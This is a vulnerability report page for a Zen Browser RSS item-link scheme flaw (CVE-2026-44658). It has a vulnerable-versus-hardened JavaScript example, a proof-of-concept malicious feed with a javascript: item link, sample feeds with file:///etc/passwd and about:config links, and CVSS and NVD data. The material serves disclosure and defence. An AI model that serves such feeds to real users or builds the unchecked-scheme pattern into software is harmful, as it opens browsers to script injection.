Security Vulnerability Report

CVE-2026-44658

Published: 2026-05-11 18:16:38
Last Modified: 2026-05-11 18:16:38

Description

Zen is a Firefox-based browser. Prior to 1.19.12b, RSS feed URLs entered by the user are restricted to the http: or https: schemes in promptForFeedUrl, but the item links inside the feed are not subject to the same restriction. The provider maps each RSS/Atom item link into item.url, filters only for presence and a date, and returns the item list. The live-folder manager later creates pinned lazy tabs from these values with gBrowser.addTrustedTab(item.url, ...), so an item link with any scheme reaches a trusted-tab open without having been checked. This vulnerability is fixed in 1.19.12b.
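The following is an added example, not code from Zen or from the advisory. It models the item pipeline the description above outlines: a minimal RSS/Atom item extractor, the pre-fix mapping that keeps item.url as-is and filters only on presence and a parseable date, and a hardened mapping that applies the same http:/https: restriction promptForFeedUrl already applies to the feed URL. The function names, the item shape and both sample feeds are assumptions for illustration; the sample feeds are constructed, not real.

```javascript
// Added example (not Zen's code). Names, item shape and sample feeds are assumptions.
const ALLOWED_SCHEMES = new Set(["http:", "https:"]);

// Constructed sample input. The feed URL itself would pass promptForFeedUrl;
// only the item links are hostile.
const FEED_URL = "https://example.com/feed.xml";
const SAMPLE_RSS = `<?xml version="1.0"?>
<rss version="2.0"><channel>
  <title>Sample</title><link>https://example.com/</link>
  <item><title>Legit</title><link>https://example.com/post/1</link>
    <pubDate>Tue, 12 May 2026 12:00:00 GMT</pubDate></item>
  <item><title>Clickbait</title><link>javascript:alert(1)</link>
    <pubDate>Tue, 12 May 2026 12:00:00 GMT</pubDate></item>
  <item><title>Obfuscated</title><link>  JAVASCRIPT:alert(2)</link>
    <pubDate>Tue, 12 May 2026 12:00:00 GMT</pubDate></item>
  <item><title>Local</title><link>file:///etc/passwd</link>
    <pubDate>Tue, 12 May 2026 12:00:00 GMT</pubDate></item>
  <item><title>Relative</title><link>/post/5</link>
    <pubDate>Tue, 12 May 2026 12:00:00 GMT</pubDate></item>
  <item><title>Undated</title><link>https://example.com/post/6</link></item>
</channel></rss>`;
const SAMPLE_ATOM = `<?xml version="1.0"?>
<feed xmlns="http://www.w3.org/2005/Atom">
  <title>Sample</title>
  <entry><title>Fine</title><link href="https://example.com/atom/1"/>
    <updated>2026-05-12T12:00:00Z</updated></entry>
  <entry><title>Bad</title><link href="about:config"/>
    <updated>2026-05-12T12:00:00Z</updated></entry>
</feed>`;

// Regex-based extraction, enough for well-formed sample input; a real provider
// would use the XML/DOM parser. Returns { title, link, date } per item/entry.
function extractItems(xml) {
  const items = [];
  for (const m of xml.matchAll(/<(item|entry)\b[^>]*>([\s\S]*?)<\/\1>/gi)) {
    const body = m[2];
    const title = body.match(/<title[^>]*>([\s\S]*?)<\/title>/i)?.[1] ?? "";
    // RSS 2.0 carries the URL as text content, Atom in an href attribute.
    const link = body.match(/<link[^>]*>([\s\S]*?)<\/link>/i)?.[1]
      ?? body.match(/<link\b[^>]*\bhref="([^"]*)"/i)?.[1]
      ?? null;
    const date = body.match(/<(pubDate|updated|published)[^>]*>([\s\S]*?)<\/\1>/i)?.[2] ?? null;
    items.push({ title: title.trim(), link, date });
  }
  return items;
}

// The pre-fix mapping as the advisory describes it (assumed shape): item.url is
// taken verbatim and the only filtering is for presence and a parseable date.
function mapItemsVulnerable(items) {
  return items
    .map((i) => ({ title: i.title, url: i.link, date: i.date ? new Date(i.date) : null }))
    .filter((i) => i.url && i.date && !Number.isNaN(i.date.getTime()));
}

// Hardened check: resolve the item link against the feed URL and accept only
// http:/https:. new URL() strips leading/trailing whitespace and lowercases the
// scheme, so "  JAVASCRIPT:..." cannot slip past a naive prefix test, and it
// throws on unparseable input. Returns the normalised href or null.
function normalizeItemUrl(raw, feedUrl) {
  if (typeof raw !== "string") return null;
  let u;
  try {
    u = new URL(raw, feedUrl);
  } catch {
    return null;
  }
  return ALLOWED_SCHEMES.has(u.protocol) ? u.href : null;
}

// Same mapping with the scheme restriction applied to every item, before
// anything reaches a trusted-tab open.
function mapItemsHardened(items, feedUrl) {
  return mapItemsVulnerable(items).flatMap((i) => {
    const url = normalizeItemUrl(i.url, feedUrl);
    return url ? [{ ...i, url }] : [];
  });
}

console.log("vulnerable:", mapItemsVulnerable(extractItems(SAMPLE_RSS)).map((i) => i.url));
console.log("hardened:  ", mapItemsHardened(extractItems(SAMPLE_RSS), FEED_URL).map((i) => i.url));
```

Run with node: the vulnerable mapping passes javascript:, file: and the whitespace/uppercase variant straight through (only the undated item is dropped), while the hardened mapping keeps just the two http(s) links and resolves the relative one against the feed URL. The Atom sample shows the same check rejecting an about: link carried in an href attribute.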

CVSS Details

CVSS Score
2.4
Severity
LOW
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:N/I:L/A:N
Weakness
CWE-20 (Improper Input Validation)

Configurations (Affected Products)

No CPE configuration data is available yet (record status: Received). The affected range stated in the advisory is:

Zen Browser < 1.19.12b (fixed in 1.19.12b)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```xml
<!-- PoC RSS feed for CVE-2026-44658 -->
<!-- Save as .xml and add it as an RSS feed in Zen Browser < 1.19.12b -->
<rss version="2.0">
  <channel>
    <title>Malicious Feed</title>
    <item>
      <title>Clickbait</title>
      <!-- The browser does not validate the scheme of this item link -->
      <link>javascript:alert('XSS via CVE-2026-44658')</link>
      <pubDate>Tue, 12 May 2026 12:00:00 GMT</pubDate>
    </item>
  </channel>
</rss>
```

Two caveats. Because promptForFeedUrl accepts only http: or https: feed URLs, the file has to be served over HTTP(S) rather than added from a local path. And the advisory describes only the missing scheme check on item links; it does not state what happens when the resulting pinned lazy tab is activated, and the CVSS vector scores the impact as low-integrity only, so treat the alert payload as the PoC author's assumption rather than a confirmed script-execution result.

References

https://github.com/zen-browser/desktop/security/advisories/GHSA-cc9c-mmmf-c5j6 (GitHub security advisory for zen-browser/desktop)
Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2026-44658",
    "sourceIdentifier": "[email protected]",
    "published": "2026-05-11T18:16:38.243",
    "lastModified": "2026-05-11T18:16:38.243",
    "vulnStatus": "Received",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "Zen is a firefox-based browser. Prior to 1.19.12b, RSS feed URLs entered by the user are validated to http: or https: in promptForFeedUrl, but item links inside the feed are not subject to the same restriction. The provider maps each RSS/Atom item link into item.url, filters only for presence and date, and returns the item list. The live-folder manager later creates pinned lazy tabs from these values with gBrowser.addTrustedTab(item.url, ...). This vulnerability is fixed in 1.19.12b."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:N/I:L/A:N",
            "baseScore": 2.4,
            "baseSeverity": "LOW",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "HIGH",
            "userInteraction": "REQUIRED",
            "scope": "UNCHANGED",
            "confidentialityImpact": "NONE",
            "integrityImpact": "LOW",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 0.9,
          "impactScore": 1.4
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Primary",
        "description": [
          { "lang": "en", "value": "CWE-20" }
        ]
      }
    ],
    "references": [
      {
        "url": "https://github.com/zen-browser/desktop/security/advisories/GHSA-cc9c-mmmf-c5j6",
        "source": "[email protected]"
      }
    ]
  }
}
```